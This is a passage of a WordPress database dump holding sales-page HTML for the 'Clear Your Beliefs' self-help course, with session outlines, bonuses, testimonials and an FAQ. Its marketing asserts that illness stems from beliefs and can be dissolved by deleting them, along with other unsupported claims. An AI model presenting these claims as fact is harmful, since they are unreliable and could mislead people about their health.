href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.</p>\n<p>This isn’t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.</p>\n<p><em>What are you capable of?  </em>If your answer is “Anything...” you don’t need this session.  But most of us think too small...</p>\n\n<p>Our <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not exercised.  We let our negative beliefs stop us. You may hear internal voices say, <em>“What’s the use?  You’ll fail anyway. You don’t deserve happiness – look at you!”  </em>We were shamed into thinking that we were less than others.We learned to compare ourselves to others – and we always lose that contest.  Clear out any apparent limitations you''ve taken on, and find your true power to create what you want.  Do whatever you need to do in order to achieve your vision.</p>\n\nDo you have beliefs that stop you from dreaming big, or following through? Do you procrastinate or get distracted? In this session, you’ll eliminate those beliefs and relieve yourself of those symptoms. You’re already a master manifestor – you''re just manifesting your old programs!\n\n<p><strong> In Session 3, you will:</strong></p>\n\nIdentify old beliefs that stand between you and creating the life you want\nDissolve the old beliefs that get in your way over and over, or make you quit when you’re partway there.\nImagine what it means to live without self-imposed limitations, trusting that you can create anything you want\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<h5>Session 4:   <strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you’ll delete beliefs that interfere with your personal relationships.</p>\n<p>If you’re married, are you happy and secure?   Or are you anxious about the future?   If you’re not in a relationship, what’s holding you back from finding your ideal mate?</p>\n<p>Humans are social creatures – we must relate to others to survive.  At our core, we want a security and safety, but we also want passion and romance.  You learned “what love is” from your parents – so it’s no wonder that you’re confused!  Most of us repeat patterns we learned from our early childhood.  We watched our parents interact, and Mom and Dad’s relationship became our model of what a relationship is supposed to look like.  In your family, love may have been  contaminated by disdain, contempt, withdrawal, or abuse.  We were programmed to repeat their patterns – without conscious choice.  This session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.</p>\n\n<p>&nbsp;</p>\n\n<p><strong> In Session 4, you will:</strong></p>\n\nLook deeply into the childhood patterns that enabled you to survive and thrive\nSee which of your beliefs now interfere with your intimate relationships\nDiscover how easy it is to shift these beliefs at the core of the psyche and transform relationship difficulties into vibrant, loving interactions\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<h5>Session 5:   <strong>Clear Your Old Beliefs About Money and Work</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img class=" wp-image-313 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" alt="sess5" width="222" height="148" /></a>In this session, you’ll focus on money, wealth and abundance – or the lack thereof!</p>\n<p>What do you believe about earning a living in today’s economy?   Is money really the root of all evil?</p>\n<p>If you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem.   Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture.   Can you see their influence?</p>\n\n<p><strong> In Session 5, you will:</strong></p>\n\nExamine your family and cultural beliefs about money, work, poverty and “deservingness.”\nRemove beliefs that create stumbling blocks in the way of natural abundance\nCreate new beliefs that enable you to open to the flow of money and resources, and the life of abundance you want - and deserve\nLearn why affirmations alone, and the “Law of Attraction,” don’t work, regardless of how diligently you practice them\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<h5>Session 6:   <strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" height="136" /></a>In this session, you’ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body.</p>\n<p>Ill health (dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood.  What do you believe and perceive about your body?   Your health?  Your age?  Your vitality?  Your ability to heal?  The future of your health?</p>\n\n<p><strong> In Session 6, you will:</strong></p>\n\nIdentify old beliefs that stand between you and vibrant health\nRecognize beliefs that make you vulnerable to disease and injury\nDissolve old beliefs at the root of illness, bad habits and lifestyle stress\nImagine the healthy, vibrant body you want, and create it consciously with new beliefs\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<h5>Session 7:   <strong>Clear Out The Rest Of The Junk In Your BeliefCloset!</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you’ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one belief at a time.</p>\n<p>You’ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.</p>\n<p>When you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you’ll have the power of any Creator – the power to shape the world as you decide, creating a better place for you and those you love.</p>\n\n<p><strong> In Session 7, you will:</strong></p>\n\nScan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live\nLearn to use the <em>BeliefCloset Process</em> on your own, anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life\nFind your <strong>True Self</strong> – the creator of your reality – and recognize it as the truth of who you really are\n\n<p></p>\n<p>&nbsp;</p>\n<h1 id="bonus">You''ll Also Receive the <em>Clear Your Beliefs</em> <em>Bonus Collection</em></h1>\n<p>In addition to these seven transformational sessions, you’ll also receive these awesome bonus interviews and gifts.  These two world luminaries will complement your learning and progress during the course, and take your understanding and practice to an even deeper level.</p>\n<p>&nbsp;</p>\n\nBonus #1:  <strong>Love:  What Makes It So Confusing?\n<em>Guest Faculty: Carista Luminare, Ph.D.</em></strong>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3.jpg"><img class="alignleft  wp-image-1053" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3-232x300.jpg" alt="Carista Portrait 3" width="161" height="209" /></a>We all want more love in our life, but something keeps getting in the way.  We can’t seem to stop hurting each other. What’s going on?</p>\n<p>Lion interviews Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, President of Luminary Leadership Institute, and co-creator of <em>Confused About Love? </em> and <em>The Power of Love</em> program.  (She is also known as <em>Lion''s fiance''</em>)</p>\n<p>Carista shares the latest research on how our early bonding patterns with our parents play out repeatedly in our adult relationships.  We’re confused about what love is, and how to love.  The answers are in our neurology, our earliest programming, and our beliefs about love and how to get it.</p>\n<p>Learn how to determine your own (and your partner’s) LoveStyle, using the <em>LoveStyle Profile Quiz </em>(Bonus # 2).  You''ll also get some practical tips for healing old wounds and bringing passion and security back into your relationship.\n<strong>\nCarista Luminare</strong>, Ph.D., is President of Luminary Leadership Institute.  She has 30 years experience as a consultant, counselor and coach to executives, entrepreneurs, and organizations.  Her comprehensive, holistic parenting methodology is described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em>  In partnership with Lion, she developed LLI’s leading-edge evolutionary leadership program.   After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs focused on the integration of the personality and soul.</p>\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\nBonus #2 <strong>- The LoveStyle Profile Quiz </strong>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships. Developed by Carista Luminare and Lion Goodman, you’ll receive a complete ten-page report that introduces you to the 5 LoveStyles, and shows you where you are on each spectrum.</p>\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\nBonus #3: <strong> The Spiritual Technology of Manifesting\nGuest Faculty: Anodea Judith, Ph.D. </strong>\n\n<p><img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" height="169" />Why don''t affirmations and the Law of Attraction work?  You’ll learn why in this interview with internationally acclaimed author and teacher Anodea Judith, one of the world’s leading experts on the Chakras.  Her books have sold more than 500,000 copies worldwide.</p>\n\n<p>Lion and Anodea discuss the principles of Manifestation outlined in their book, <em>Creating On Purpose: The Spiritual Technology of Manifesting Through the Chakras.  </em>Beliefs are at the core of the manifestation process, and<em> t</em>heir book is a step-by-step manual for turning any dream into a reality by taking a single idea down through the chakras and into the real world.  You’ll receive the first two chapters of the book as Bonus #4, below.</p>\n\n<p>Anodea Judith, Ph.D. is the author of <em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global Heart Awakens</em>.  She leads workshops on the chakras, psychological development, and spiritual transformation in the U.S. and around the world.  Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.</p>\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\nBonus #4: <strong> Excerpt from the book, "<em>Creating on Purpose: The Spiritual Technology of Manifesting Through the Chakras"</em></strong>\n\n<p><strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:</p>\n\nBe called to awaken your already-powerful ability to create the life of your dreams\nLearn how the chakras represent two human challenges: <strong>liberation</strong> (from the bottom up) and <strong>manifestation</strong> (from the top down)\nUnderstand the 7 chakras as stepping stones along the path of the manifestation process\nGain an understanding of resistance, obstacles, and barriers that come up as you create what you want in life\nLearn a process that can strengthen your power of intention\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\nBonus #5:<strong> Change Your Beliefs eBook</strong>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png"><img class=" wp-image-433 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png" alt="TYB Cover" width="159" height="206" /></a></p>\n\n<p>You’ll also receive a copy of Lion’s multimedia eBook, “<em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>” </p>\n<p>Lion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why you do what you do, and why it’s so difficult to change your habitual patterns of thought and behavior. </p>\n<p>It’s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.</p>\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\nBonus #6: <strong>Complete Transcripts of the Course</strong>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding.jpg"><img class="alignleft  wp-image-985" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding-300x199.jpg" alt="ReportsLanding" width="148" height="98" /></a>You''ll also receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!</p>\n\n<p>&nbsp;</p>\n<h1 id="bonus">Your Professional Coaching Sessions</h1>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support.jpg"><img class=" wp-image-318 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support-300x254.jpg" alt="support" width="195" height="165" /></a>If you''re registering as part of a Clear Your Beliefs Coaching program, you''ll work with your <em>Clear Your Beliefs Coach</em> weekly. He or she will accompany you on your journey and guide you, step-by-step, through the process.</p>\n<p><em>Clear Your Beliefs Coaches</em> have been trained to help you deal with almost any issue, regardless of how long it''s been interfering with your life. Your coach will safely guide you down to the deepest levels of your psyche – which can be difficult to get to all by yourself – yet it''s where the most powerful changes occur.  He or she will meet with you by phone (or Skype) each week, on a day that fits your schedule, at a time that''s convenient for you.</p>\n<p>Your coach will guide you through any difficult inner terrain you might encounter, and help you identify and delete difficult-to-locate core beliefs.</p>\n<p><strong>[Note: Our coaches help you change your own beliefs and reduce or eliminate the impact they’ve had on your life. They are not licensed psychotherapists or physicians. If you have a medical or mental health issue, please consult an appropriate professional who specializes in your particular diagnosis.]</strong>\n<a name="package"></a></p>\n<p style="text-align: right"><a href="http://clearyourbeliefs.com/program/#top">Up To Top</a></p>\n<p>&nbsp;</p>\n\n<h1>Purchase Today and You’ll Receive:</h1>\n<p><strong>Seven 90-Minute Class Sessions</strong> – Learn one of the world’s most powerful belief-change technologies, from the comfort of your own home. Each class session gives you the skill to easily change your beliefs – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. Listen online, or download high-quality MP3s and listen anytime.</p>\n<h3 style="font-size: 20px">Plus: <em>The Entire BONUS Collection:</em></h3>\n\n<strong><em>What Makes Love So Confusing?</em> </strong>– Audio interview featuring Carista Luminare, Ph.D.\n<em>T<strong>he Spiritual Technology of Manifesting</strong></em> – Audio interview featuring Anodea Judith, Ph.D.\nYour Childhood Bonding Pattern Assessment: <strong><em>The LoveStyle Profile Quiz</em></strong>\n<strong><em>Creating On Purpose: The Spiritual Technology of Manifesting through the Chakras </em></strong> – The first 2 chapters from the book by Lion Goodman and Anodea Judith (PDF)\nMultimedia eBook: <strong><em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em></strong> by Lion Goodman (PDF)\n<strong>A complete set of PDF Transcripts</strong> of all seven classes plus two bonus calls.\n<strong>Optional:</strong> Professional Coaching Sessions.\n\n<p>&nbsp;</p>\n\n<p>&nbsp;</p>\n<p><a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank">Select Your Plan</a></p>\n<p style="text-align: center">OR</p>\n<p><a href="http://clearyourbeliefs.com/free-ebook" target="_blank">Free eBook</a></p>\n\n<p>&nbsp;</p>\n\n<h1>Satisfaction Guaranteed</h1>\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don’t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we’ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)</p>\n<p>&nbsp;</p>\n<h1>About Lion Goodman</h1>\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face.jpg"><img class="alignleft wp-image-303 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face-260x300.jpg" alt="lion-face" width="151" height="175" /></a>Lion is C.E.O. of Luminary Leadership Institute, a consulting firm dedicated to bringing leaders of businesses and organizations into alignment with their True Self and their highest virtues.</p>\n<p>He is the creator of <strong><em>The BeliefCloset Process</em></strong>®, and author of <em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em></p>\n<p>He is the co-author, with Anodea Judith, of <em>Creating on Purpose: The Spiritual Technology of Manifesting through the Chakras</em> <em>.</em> With his partner, Carista Luminare, Ph.D., he created a program for couples and singles who want to create a more secure and passionate relationship:<em><strong> Confused About Love? The Keys to Creating a Secure and Passionate Relationship.</strong></em></p>\n<p>Lion has more than 35 years experience in transformational coaching, entrepreneurial business, spiritual practice, and men’s work. He is a co-founder of <em>The Tribe of Men</em>, an initiatory program for men, and served as Director of Men’s Programs for The Shift Network, where he created programs that served more than 20,000 people around the world. He blogs at www.GoodMenProject.com and www.YourTango.com.</p>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n\n<h1>Praise for Lion and Clear Your Beliefs</h1>\n\n<p><em>“You helped me resolve in a short time issues in my life that I’ve struggled with for years. In addition, I can use the tools you’ve taught me to deal with any difficult circumstance that may appear in the future.”</em></p>\n<strong>– G. J., software developer</strong>\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>“Lion''s decades of experience in all facets of transformation combined with his profound love, great sense of humor and powerful commitment to humanity make him an outstanding facilitator for awakening and liberation. If you choose to work with him, you’ll grow to love him, as I do.”</em></p>\n<strong>~ Stephen Dinan, CEO and founder, The Shift Network</strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>“In just one BeliefCloset session, I experienced a subtle and profound shift in the way I relate to my children. It continues to enrich the way I''m able to be fully present with them each and every day.”</em></p>\n<strong>~ Jamee Tenzer, Life Coaching for Working Women</strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>“Thank you taking me back to the beginning to help me hit the “reset” button. You demonstrated your mastery and provided an unbelievable learning opportunity. Thank you for showing me that there are no limits in the Imaginal Realm, and for reinforcing the power that resides in the BeliefCloset Process. I am humbled and very grateful. I may never truly be able to comprehend all that happened and the changes to my mindset and my life. I wish I could put how I feel into words. My outlook is brighter, my steps seems lighter, and losing weight is now just an overdue task to take care of, without all the shame and emotions that had always been attached to it. ”</em></p>\n<strong>~ S.K., Life Coach, Ontario, Canada </strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>“What an extraordinary experience! The process is simple, straightforward, powerful, and FUN! Changing beliefs is no longer a heavy, ponderous, months-long process. I finished my session with a smile, and the anxiety triggered by my old beliefs has disappeared. My new ’belief-outfits’ are perfect for me, and I’m wearing them with joy and enthusiasm!”</em></p>\n<strong>~ D. T., Physical Therapist, Denver, CO </strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>“The BeliefCloset Process is like a magic wand – I can easily and quickly change any aspect of myself by changing my beliefs.”</em></p>\n<strong> ~ T. S., Business Owner, Yukon, Canada</strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>“The BeliefCloset Process gave me the room to safely acknowledge and work through my hidden, unconscious beliefs. I am now free of the past and can see myself more clearly than ever before.”</em></p>\n<strong>~ T. L., Healer, Stamford, CT </strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>“I clearly saw how and why I was doing the things I do. I realized that my difficulties stemmed from my beliefs – especially those I was unaware of. I appreciate the sincerity and integrity of the BeliefCloset Process.”</em></p>\n<strong> ~ R. D., Benedictine Priest, San Francisco, CA </strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>“The BeliefCloset Process has been exceedingly helpful to me on my own internal journey, and it''s a tool I reach for frequently in my psychotherapy practice. It leads to discovery, insight, and change, often with an element of lyricism and poignancy. The explorations are both gentle and profound, and it provides rich material for reflection in the endlessly imaginative outfits that appear in the BeliefCloset. It provides real world results for my clients, and I continue to use, both in my practice and in my own personal growth.”</em></p>\n<strong>~ Martha Bear, Psychotherapist, BeliefCloset Practitioner</strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"I uncovered beliefs I didn''t know I had, including: “I''m wretched. There is no God. I am ashamed of myself. I am unworthy of God.” It was an intense process! Each time I deleted an old belief, something shifted at my core. I then replaced each one with a positive belief for my life. That old heavy weight around my heart just lifted off me. I''ve been in awe ever since. You''ve found a powerful way to access the deep subconscious mind!" </em></p>\n<strong>~ Maria Garcia, yoga teacher and BeliefCloset Practitioner</strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>“This valuable tool will enhance your life in ways you cannot imagine. It’s added extraordinary value to my life. I feel calmer overall, and know I have a tool that will enable me to keep growing and expanding.”</em></p>\n<strong>~ C.T., Performance and Life Coach</strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>“I now feel empowered to create the life I want, and believe I can accomplish all my goals through shifting my thinking. I am no longer fearful of my limiting beliefs, because now I have a tool to change them.”</em></p>\n<strong>– M.M., International Business Consultant</strong>\n\n<p>&nbsp;</p>\n\n<p>&nbsp;</p>\n<p><a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank">Select Your Plan</a></p>\n<p style="text-align: center">OR</p>\n<p><a href="http://clearyourbeliefs.com/free-ebook" target="_blank">Free eBook</a></p>\n\n<p>&nbsp;</p>\n<h1>Satisfaction Guaranteed</h1>\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don’t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we’ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)</p>\n<p>&nbsp;</p>\n<h1>Frequently Asked Questions</h1>\n\n<p><strong>Q: What is a virtual course?</strong></p>\n\n<p>A: It’s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs coach, you’ll work by phone or Skype at a time that’s most convenient to you.</p>\n\n<p>In addition to excellent guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. You can use Skype or Google Voice to call your coach.</p>\n\n<p><strong>Q: How long will I have access to the course?</strong></p>\n\n<p>A: You can download the course recordings, transcripts, and bonus materials from our online media archive to your own computer, so you’ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.</p>\n\n<p><strong>Q: Are there scholarships available?</strong></p>\n\n<p>A: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to <a href="mailto:info@clearyourbeliefs.com">info@clearyourbeliefs.com</a>, with a description of your circumstances and your offer of what you can pay.</p>\n\n<p><strong>Q: What is your refund policy?</strong></p>\n\n<p>A: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.</p>\n\n<p><strong>Q: How can I reach Customer Support?</strong></p>\n\n<p>A: Please send an email to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. We’ll get back to you within 48 hours (sometimes longer over weekends).</p>\n\n<p><strong>Q: What is your Privacy Policy?</strong></p>\n\n<p>A: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from <a href="http://www.ClearYourBeliefs.com" target="_blank">ClearYourBeliefs.com</a>, <a href="http://www.BeliefCloset.com" target="_blank">BeliefCloset.com</a>, or <a href="http://www.ConfusedAboutLove.com" target="_blank">ConfusedAboutLove.com.</a></p>\n\n<p>You may unsubscribe anytime you wish. Unsubscribing will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.</p>\n\n<p>All information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.</p>\n\n<p>// </p>', 'Clear Your Beliefs Program', '', 'inherit', 'closed', 'open', '', '1941-revision-v1', '', '', '2014-12-14 21:32:38', '2014-12-15 02:32:38', '', 1941, 'http://clearyourbeliefs.com/1941-revision-v1', 0, 'revision', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(2059, 2, '2014-12-16 01:33:21', '2014-12-16 06:33:21', '<img class="img-responsive"  src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" />\n\nFree eBook\n\n<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" />\n<p class="tri-panel-p tri-panel-1st-p" style="text-align: center; padding-top: 30px !important; margin: 0px;"><strong>Get the free eBook.</strong></p>\n\nFIRST NAME *\n\nEMAIL *\n\nFree App\n<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iclearit-App-logo_FINAL-246x300.jpg" alt="download" width="89" height="87" />\n<p class="tri-panel-p tri-panel-2nd-p-1" style="text-align: center; margin-top: 32px;"><strong>Download the Free App</strong>\nfor iPhone &#038; iPad</p>\n<p class="tri-panel-p tri-panel-2nd-p-2" style="text-align: center; font-size: 14px; margin-bottom: -4px; padding:0 5px;">Start Clearing Whatever Is In The Way Right Now!</p>\n\n<p class="tri-panel-p tri-panel-2nd-p-2" style="text-align: center; font-size: 14px; margin-bottom: -4px; padding:0 5px;">FREE (for a limited time)</p>\nComplete Program\n<img style="margin-top: 0px !important; width: 100% !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/11/cyb-3rd-head.jpg" alt="" />\n\n<p class="tri-panel-p tri-panel-3rd-p" style="text-align: center; margin-top: 10px; font-size: 16px;"><strong>Clear Your Limiting\nand Negative Beliefs</strong> <strong>\n- Permanently!</strong>\n\n<p class="tri-panel-p tri-panel-3rd-p-2" style="text-align: center; font-size: 14px; margin-bottom: -2px; padding:0 5px;">A 7-week journey into your\nsubconscious mind to delete the beliefs that hold you back.\n\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n\nRelease pain and hurts from the past\nOpen to deeper, more profound love\nRecognize your true spiritual nature\nBecome more calm and less reactive\nRediscover the source of your personal power\n\nClear whatever stops you from taking action\nOpen yourself to new possibilities of success\nEliminate blocks and barriers easily\nDiscover your true purpose\nExpress your true magnificence\n\n<h2>How and Why It Works So Well</h2>\n\nBeliefs are the major cause of unhappiness, upsets, and limitations.\nThe <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.\nThe process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.\nYou''re in charge – you decide what you want to believe, and how far you want to go.\nThe program guides you, gently, step-by-step, through the entire process of deleting beliefs.\nUnlike other methods, the changes you make are permanent – your old beliefs don''t come back.\n\n<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2>\n<p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I 